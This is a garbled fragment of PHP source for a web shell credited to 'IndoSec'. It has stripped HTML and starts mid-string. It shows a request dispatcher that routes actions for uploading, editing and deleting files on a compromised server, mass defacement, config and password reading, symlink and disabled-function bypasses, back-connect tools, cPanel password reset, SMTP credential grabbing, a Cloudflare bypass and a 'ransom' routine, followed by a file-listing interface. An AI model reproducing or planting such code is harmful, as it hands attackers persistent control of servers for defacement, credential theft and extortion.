"; exit; } if (isset($_GET['about'])){ about(); } if ($_GET['aksi'] == 'upload'){ aksiUpload($dir); } if (isset($_GET['file'])){ $file = $_GET['file']; } $nfile = basename($file); if($_GET['aksi'] == 'chmod_file'){ chmodFile($dir,$file,$nfile); } if ($_GET['aksi'] == 'buat_file'){ buatFile($dir,$imgfile); } if($_GET['aksi'] == 'view'){ view($dir,$file,$nfile,$imgfile); } if($_GET['aksi'] == 'edit'){ editFile($dir,$file,$nfile,$imgfile); } if($_GET['aksi'] == 'rename'){ renameFile($dir,$file,$nfile,$imgfile); } if ($_GET['aksi'] == 'hapusf'){ hapusFile($dir,$file,$nfile); } $ndir = basename($dir); if($_GET['aksi'] == 'chmod_dir'){ chmodFolder($dir,$ndir); } if ($_GET['aksi'] == 'buat_folder' ){ buatFolder($dir,$imgfol); } if ($_GET['aksi'] == 'rename_folder' ){ renameFolder($dir,$ndir,$imgfol); } if ($_GET['aksi'] == 'hapus_folder' ){ deleteFolder($dir,$ndir); } if($_GET['aksi'] == 'masdef'){ aksiMasdef($dir,$file,$imgfol,$imgfile); } if($_GET['aksi'] == 'masdel'){ aksiMasdel($dir,$file,$imgfol,$imgfile); } if($_GET['aksi'] == 'jumping'){ aksiJump($dir,$file,$ip); } if($_GET['aksi'] == 'config'){ aksiConfig($dir,$file); } if($_GET['aksi'] == 'passwbypass'){ aksiBypasswd($dir,$file); } if($_GET['aksi'] == 'adminer'){ aksiAdminer($dir,$file); } if($_GET['aksi'] == 'symlink'){ aksiSym($dir,$file); } if($_GET['aksi'] == 'symread'){ aksiSymread($dir,$file); } if ($_GET['aksi'] == 'sym_404'){ sym404($dir,$file); } if ($_GET['aksi'] == 'sym_bypas'){ symBypass($dir,$file); } if($_GET['aksi'] == 'bctools'){ bcTool($dir,$file); } if($_GET['aksi'] == 'disabfunc'){ disabFunc($dir,$file); } if ($_GET['aksi'] == 'resetpasscp'){ resetCp($dir); } if($_GET['aksi'] == 'auteduser'){ autoEdit($dir,$file); } if ($_GET['aksi'] == 'ransom'){ ransom($dir,$file); } if ($_GET['aksi'] == 'smtpgrab'){ scj($dir); } if ($_GET['aksi'] == 'bypascf'){ bypasscf(); } if($_GET['aksi'] == 'zip_menu'){ zipMenu($dir,$file); } if(isset($_GET['path'])){ $path = $_GET['path']; chdir($path); }else{ $path = getcwd(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); echo "Path : "; foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo '/'; continue; } if($pat == '') continue; echo ''.$pat.'/'; } $scandir = scandir($path); echo "  [ ".w($dir, perms($dir))." ]"; echo '
'; foreach($scandir as $dir){ $dtime = date("d/m/y G:i", filemtime("$dir/$dirx")); if (strlen($dir) > 18){ $_dir = substr($dir, 0, 18)."..."; }else{ $_dir = $dir; } $_diir = $_dir; if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue; echo ''; } foreach($scandir as $file){ $ftime = date("d/m/y G:i", filemtime("$path/$file")); if(!is_file($path.'/'.$file)) continue; echo ''; } echo '
File/folder Size Last Modified Permission Action
'.$imgfol.' '.$_diir.' -- '.$dtime.' '; if(is_writable($path.'/'.$dir)) echo ''; elseif(!is_readable($path.'/'.$dir)) echo ''; echo perms($path.'/'.$dir); if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '       
'; if (strlen($file) > 25){ $_file = substr($file, 0, 25)."...-.".$ext; }else{ $_file = $file; } echo' '.$_file.' '.formatSize(filesize($file)).' '.$ftime.' '; if(is_writable($path.'/'.$file)) echo ''; elseif(!is_readable($path.'/'.$file)) echo ''; echo perms($path.'/'.$file); if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '                       

Copyright 2019 { IndoSec }

'; echo "";?>